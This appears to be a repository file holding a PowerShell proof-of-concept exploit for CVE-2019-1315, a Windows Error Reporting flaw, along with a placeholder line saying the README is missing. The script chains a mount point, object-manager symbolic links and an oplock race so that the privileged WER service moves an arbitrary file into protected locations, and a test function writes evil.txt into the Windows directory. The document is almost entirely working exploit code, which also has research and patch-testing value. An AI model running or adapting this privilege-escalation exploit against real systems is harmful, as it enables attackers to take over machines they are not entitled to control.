README.md
README.md not found for CVE-2019-1315. The file may not exist in the repository.
Import-Module "$PSScriptRoot\NtApiDotNet.dll" -ErrorAction Stop
$TempReportDir = "$env:SystemRoot\Temp\RQ"
function Invoke-MoveFileUsingWER($Source, $Destination) {
Write-Host "Setting up dirs & files..."
New-Item -Type Directory -Path $TempReportDir -Force | Out-Null
Copy-Item "$PSScriptRoot\Report.wer" "$TempReportDir\Report.wer" -ErrorAction Stop
Copy-Item "$PSScriptRoot\Report.wer" "$TempReportDir\Report.wer.tmp" -ErrorAction Stop
Write-Host "Setting up pseudo-symlinks..."
[NtApiDotNet.NtFile]::CreateMountPoint("\??\$env:ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e", "\RPC Control", $null)
$wer = [NtApiDotNet.NtSymbolicLink]::Create("\RPC Control\Report.wer", "\??\$TempReportDir\Report.wer")
$wer_tmp = [NtApiDotNet.NtSymbolicLink]::Create("\RPC Control\Report.wer.tmp", "\??\$TempReportDir\Report.wer.tmp")
$tmp_file = [NtApiDotNet.NtFile]::Open("\??\$TempReportDir\Report.wer.tmp", $null, [NtApiDotNet.FileAccessRights]::ReadAttributes, [NtApiDotNet.FileShareMode]::All, [NtApiDotNet.FileOpenOptions]::None)
Write-Host "Placing oplock..."
$task = $tmp_file.OplockExclusiveAsync()
Write-Host "Triggering WER..."
Start-Process -NoNewWindow powershell.exe "-Command `"[Environment]::FailFast('Error')`""
Write-Host "Waiting for oplock to trigger..."
$task.Wait()
Write-Host "Oplock triggered, switching symlinks..."
$wer.Dispose()
$wer_tmp.Dispose()
$wer = [NtApiDotNet.NtSymbolicLink]::Create("\RPC Control\Report.wer", "\??\$Destination")
$wer_tmp = [NtApiDotNet.NtSymbolicLink]::Create("\RPC Control\Report.wer.tmp", "\??\$Source")
Write-Host "Releasing Oplock..."
$tmp_file.AcknowledgeOplock([NtApiDotNet.OplockAcknowledgeLevel]::No2)
Write-Host "Waiting for wemgr process to finish..."
Sleep -Seconds 1
While ( -not (Get-Process -Name wemgr -ErrorAction SilentlyContinue) -eq $null ) {
Sleep -Milliseconds 500
}
Write-Host "Cleanup..."
$tmp_file.Close()
$wer.Dispose()
$wer_tmp.Dispose()
[NtApiDotNet.NtFile]::DeleteReparsePoint("\??\$env:ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e") | Out-Null
Remove-Item -Path "$env:ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e" -Force
Remove-Item -Path $TempReportDir -Recurse -Force
}
function Test-IsFileWritable($Path) {
$result = $False
Try {
[IO.File]::OpenWrite($Path).close()
$result = $True
} Catch {
$result = $False
}
return $result
}
# Use the bug to create a file in the Windows directory
function Test-Exploit($TargetFile) {
if($TargetFile -eq $null) {
$TargetFile = "$env:SystemRoot\evil.txt"
}
if(Test-Path $TargetFile) {
Write-Warning "Target file already exists, exiting"
return
}
New-Item -Type File -Path "$env:SystemRoot\Temp\testfile" -Value "test" -ErrorAction Stop | Out-Null
Invoke-MoveFileUsingWER -Source "$env:SystemRoot\Temp\testfile" -Destination $TargetFile
if (Test-IsFileWritable($TargetFile)) {
Write-Host -ForegroundColor Green "File $TargetFile successfully created!"
Get-Item $TargetFile
} else {
Write-Warning "File not created or not writable."
Remove-Item -Path "$env:SystemRoot\Temp\testfile" -Force -ErrorAction SilentlyContinue
}
}